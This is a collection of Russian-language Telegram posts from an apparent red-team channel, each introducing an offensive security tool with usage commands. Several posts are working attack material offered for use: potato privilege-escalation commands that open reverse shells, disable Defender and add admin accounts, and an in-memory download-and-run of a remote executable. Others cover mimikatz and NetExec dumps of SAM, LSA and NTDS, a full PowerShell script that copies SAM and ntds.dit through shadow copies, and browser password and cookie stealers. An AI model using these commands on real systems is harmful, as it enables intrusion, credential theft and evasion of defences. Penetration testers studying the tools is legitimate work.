Exploiting Native AD Techniques for Security
Проект предоставляет обширную коллекцию методов, команд и функций
Базу надо знать!
Некоторые примеры:
# Collect Domain SID
Get-ADDomain | Select-Object SID
# Users with Delegation Privileges
Get-ADUser -Filter {TrustedForDelegation -eq $true}
# Get Domain Users Last Logon Time
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate
# List Users in Specific Group
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName
# List Service Principal Names (SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName
# Check for Kerberos Pre-Authentication Disabled Accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName
#lolad #redteam #active_directory #powershell #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
NetExec является форком и продолжением утилиты crackmapexec
Отличный инструмент для проведения пентеста
Большое кол-во фиксов, изменений - подробнее
Поддержка протоколов:
mssql
winrm
vnc
ftp
rdp
ssh
ldap
wmi
smb
nfs
Установка в
sudo apt update && sudo apt install netexec
Скачать:
#nxc #netexec #python #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
В данной версии интегрировали поддержку LLM 😄😱
Установка Ollama:
curl -fsSL https://ollama.com/install.sh | sh
ollama pull llama3.1
ollama run llama3.1
# Проверка
curl -s -D - localhost:11434/api/chat -d '{"model":"llama3.1"}'
Установка Evil-WinRM:
sudo gem install evil-winrm-ai
Запуск разных моделей:
# Ollama, specifying an LLM model setting the URL of the listener containing the Ollama service
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm ollama --llm-url 'https://127.0.0.1:11434' --llm-model ollama/llama3.1
# OpenAI, specifying an LLM model and enabling the LLM commands history
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm openai --llm-api-key 'xxx' --llm-history --llm-model gpt-4o
# Gemini, just using it enabling debug mode
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm gemini --llm-api-key 'xxx' --llm-debug
# Mistral-AI, specifying an LLM model
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm mistral-ai --llm-api-key 'xxx' --llm-model open-mistral-7b
LLM опции:
--llm LLM (Ollama, Openai, Anthropic, Mistral-ai, Gemini, Azureopenai)
--llm-model модель LLM
--llm-url URL сервиса (Ollama и Azureopenai)
--llm-api-key ключ API
--llm-history история команд
--llm-debug отладка
После подключения к хосту используем команду ai: и далее наш промпт
ai:enumerate local users
ai:enumerate local groups
Возможности:
▪️ Загрузка PowerShell скриптов
▪️ Загрузка dll файлов
▪️ Запуск .NET приложений
▪️ Pass-the-hash,
▪️ Kerberos аутентификация
▪️ Поддержка SSL
▪️ Upload и Download файлов
▪️ История команд
▪️ Удобный и цветастый промпт
Запуск:
evil-winrm-ai -i 192.168.1.100 -u Adm -p 'pass' -s '/home/user/ps1_scripts/' -e '/home/user/exe_files/' --llm ollama --llm-url 'https://127.0.0.1:11434' --llm-model llama3.1:latest
#evilwinrm #winrm #pentest #ruby #llm #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Современный высокоскоростной фаззер, написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.
Установка в Kali:
sudo apt update && sudo apt install -y feroxbuster
Windows via chocolatey или winget:
choco install feroxbuster
winget install epi052.feroxbuster
Примеры:feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx
feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"
feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080
cat targets | feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
feroxbuster -u https://127.1 --extract-links
feroxbuster -u https://127.1 --filter-status 301
feroxbuster -u https://127.1 --filter-regex '[aA]ccess [dD]enied.?' --output results.txt --json
#feroxbuster #fuzzing #rust #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Сканер уязвимостей в контейнерах и не только. Написан на
Цели:
▪️ Контейнеры
▪️ Файловые системы
▪️ Git репозитории (удаленный)
▪️ Образы ВМ
▪️ Kubernetes
▪️ AWS
Сканирует:
▪️ ПО и зависимости
▪️ Известные уязвимости (CVEs)
▪️ Мисконфиги
▪️ Чувствительную информацию
Установка в
wget https://github.com/aquasecurity/trivy/releases/download/v0.56.2/trivy_0.56.2_Linux-64bit.deb
sudo dpkg -i trivy_0.56.2_Linux-64bit.deb
Примеры:
trivy <target> [--scanners <scanner1,scanner2>] <subject>
trivy image python:3.4-alpine
trivy fs --scanners vuln,secret,misconfig myproject/
trivy k8s --report summary cluster
trivy sbom /path/to/sbom_file
#trivy #soft #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
Узкоспециализированный инструмент написанный на
Установка:
sudo python3 -m pip install apachetomcatscanner
Запуск:ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves
▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite
#tomcat #apache #apachetomcatscanner #soft #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на
Установка:
go install github.com/hahwul/dalfox/v2@latestПример:
dalfox url https://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url#soft #dalfox #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
Notes from Black Hat USA 2024:
“I hate to report it, but the Russian underground is as strong as ever”
#pentest #blackhat #blackhatusa
Please open Telegram to view this post
VIEW IN TELEGRAM
Пополнение в "картофельном" семействе. Как и для остальных необходима привилегия
SeImpersonatePrivilegeВозможности:
deadpotato.exe -cmd "whoami"
deadpotato.exe -rev 192.168.10.30:9001
deadpotato.exe -exe paylod.exe
deadpotato.exe -newadmin adm:pass
deadpotato.exe -shell
deadpotato.exe -mimi sam
deadpotato.exe -defender off
deadpotato.exe -sharphound
#lpe #windows #potato #soft #csharp
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент для восстановления забытых 😄 паролей, написан на Python
Примеры использования:
laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password
#lazagne #python #password #recovery #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Если вкратце то SQLMap на минималках 😃
Проект интересный. С простенькими заданиями справился, что приятно удивило!
Поддерживаемые техники:
Boolean based
Error Based
Time Based
Stacked Queries
Поддерживаемые СУБД:
MySQL
Microsoft SQL Server
Postgres
Oracle
Поддерживаемые типы:
GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML
git clone https://github.com/r0oth3x49/ghauri.git
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'https://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
#ghauri #sqli #sqlinjection #python #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
SAM - Security Account Manager. Хранит информацию о локальных пользователях, включая хеши паролей и идентификаторы
NTDS - основной файл ntds.dit NT Directory Services, dit - Directory Information Tree
БД в которой хранится информация обо всех объектах. Находится на контроллере домена
Есть различные варианты получить данные файлы, например с помощью mimikatz или NetExec
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"
nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --sam
nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --ntds
Доработал простенький скрипт на
Работает на десктопных (понятно без ntds.dit) и на серверных системах, включая DC
Скрипт при необходимости создает директорию
C:\Temp и копирует туда файлы, так же включает VSS и по окончании работы отключает.Запускать в классическом
$vss=(Get-Service -name VSS)
if($vss.Status -ne "Running"){
$notrunning=1; $vss.Start()
}
$tempdir = "C:\Temp"
if (!(Test-Path $tempdir)) {
New-Item -ItemType Directory -Path $tempdir
}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" $tempdir
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" $tempdir
if (Test-Path -Path "C:\Windows\NTDS\ntds.dit") {
cmd /c copy "$($volume.DeviceObject)\Windows\NTDS\ntds.dit" $tempdir
}
$volume.Delete(); if($notrunning -eq 1){
$vss.Stop()
}
Полученные файлы разбираем в
impacket-secretsdump LOCAL -sam SAM -system SYSTEM
impacket-secretsdump LOCAL -ntds ntds.dit -system SYSTEM
Что делать с хешиками вы уже знаете 😄👍
#windows #sam #ntds #hashes #powershell
Please open Telegram to view this post
VIEW IN TELEGRAM
Очень быстрый сканер портов написанный на Rust
Установка в Debian like:
sudo dpkg -i rustscan_(ver).debИспользование:
rustscan -a 127.0.0.1,0.0.0.0rustscan -a 192.168.0.0/30rustscan -a 'hosts.txt'rustscan -a 127.0.0.1 --range 1-1000#rustscan #rust #soft #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент помогающий вспомнить "забытые" пароли от различных браузеров. Также извлекает 🍪 cookie, закладки и историю. Написан на
Поддержка браузеров в
Google Chrome
Chromium
Microsoft Edge
360 Speed
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox
Примеры использования:
hack-browser-data.exe -b all -f json --dir results --zip
hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"
#hackbrowserdata #golang #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
NTLM.PW
NTLM to plaintext password lookup
Instantly look up NTLM hashes and resolve them to plaintext passwords using our database with 8B+ entries.
Сервис уже не новый, но крайне полезный
Я немного запоздал с постом 😄👍
#ntlm #hash
Please open Telegram to view this post
VIEW IN TELEGRAM
Современный высокоскоростной фаззер написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.
Kali:
sudo apt update && sudo apt install -y feroxbuster
Windows via chocolatey:
choco install feroxbuster
Примеры:feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx
feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"
feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080
#feroxbuster #fuzzing #rust #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент для повышения привилегий в
Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege
Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д.
whoami /privИз плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a
Примеры:
./SigmaPotato.exe --revshell ip port[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))
[SigmaPotato]::Main(@("--revshell","ip","port"))Windows 8/8.1 - Windows 11
Windows Server 2012 - Windows 2022
#potato #lpe #windows #soft #sigmapotato
Please open Telegram to view this post
VIEW IN TELEGRAM
🎟 btconverter
При пентесте🪟 Active Directory очень часто приходиться работать с Kerberos и в частности с получением и использованием билетов
Для данных целей обычно используют следующие инструменты:
💻 Rubeus
💻 Impacket
При дампе или запросе в Rubeus мы получим закодированный в base64 билет
Если захотим использовать его в инструментах impacket, необходимо конвертировать в формат ccache
Обычно это делается так:
При получение билета в impacket будем конвертировать в обратном порядке. Иной раз делать это приходиться очень часто, поэтому написал небольшой скрипт для автоматизации данной задачи
Для работы скрипта в💻 Kali есть все необходимые тулзы. Если по какой то причине impacket не установлен:
Далее ставим скрипт:
На вход принимает 1 аргумент, билет в формате .b64|kirbi|ccache
Готово!
💻 Home
#kerberos #tickets #bash #impacket #rubeus
✈️ Whitehat Lab
При пентесте
Для данных целей обычно используют следующие инструменты:
При дампе или запросе в Rubeus мы получим закодированный в base64 билет
Если захотим использовать его в инструментах impacket, необходимо конвертировать в формат ccache
Обычно это делается так:
echo "doIGIDCCBhygAwIBBaE(..snip..)9SRzE3LkxPQ0FM" | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
При получение билета в impacket будем конвертировать в обратном порядке. Иной раз делать это приходиться очень часто, поэтому написал небольшой скрипт для автоматизации данной задачи
Для работы скрипта в
sudo apt update
sudo apt install python3-impacket
Далее ставим скрипт:
wget https://raw.githubusercontent.com/akhomlyuk/btconverter/main/btconverter.sh
chmod +x btconverter.sh
sudo mv btconverter.sh /usr/bin/btconverter
На вход принимает 1 аргумент, билет в формате .b64|kirbi|ccache
btconverter ticket.b64btconverter ticket.ccachebtconverter ticket.kirbiГотово!
#kerberos #tickets #bash #impacket #rubeus
Please open Telegram to view this post
VIEW IN TELEGRAM
Отличный инструмент предназначенный для отслеживания процессов без необходимости использования root прав. Он позволяет видеть команды выполняемые другими пользователями, задания cron и т. д.
Написан на Go. Постоянно использую при решение машин на
Запуск в
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64./pspy64-r - список директорий для отслеживания (по дефолту /usr, /tmp, /etc, /home, /var и /opt)
-i - интервал в мс
-f - события файловой системы
--debug - вывод подробной информации
Готово, рекомендую!
#golang #pspy #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Чекер CVEs и уязвимостей написанный на C# для ОС
Поддерживаемые версии:
Windows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)
Windows 11 (Versions: 21H2, 22H1, 22H2, 23H1)
Windows Server 2016, 2019, 2022
Список уязвимостей (35):
MS10-015
MS10-092
MS13-053
MS13-081
MS14-058
MS15-051
MS15-078
MS16-016
MS16-032
MS16-034
MS16-135
CVE-2017-7199
CVE-2019-0836
CVE-2019-0836
CVE-2019-1064
CVE-2019-1130
CVE-2019-1253
CVE-2019-1315
CVE-2019-1385
CVE-2019-1388
CVE-2019-1405
CVE-2020-0668
CVE-2020-0683
CVE-2020-0796
CVE-2020-1013
CVE-2020-1013
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
CVE-2021-44228
CVE-2021-36934
CVE-2022-40140
CVE-2022-22965
CVE-2023-36664
1.2 added:
2023-23397
2022-34718
Также бот поддерживает поиск эксплоитов по CVE
!poc CVE-2019-1064Для сборки понадобится Visual Studio и .NET Framework 4.8 Developer Pack
#moriarty #checker #csharp
Please open Telegram to view this post
VIEW IN TELEGRAM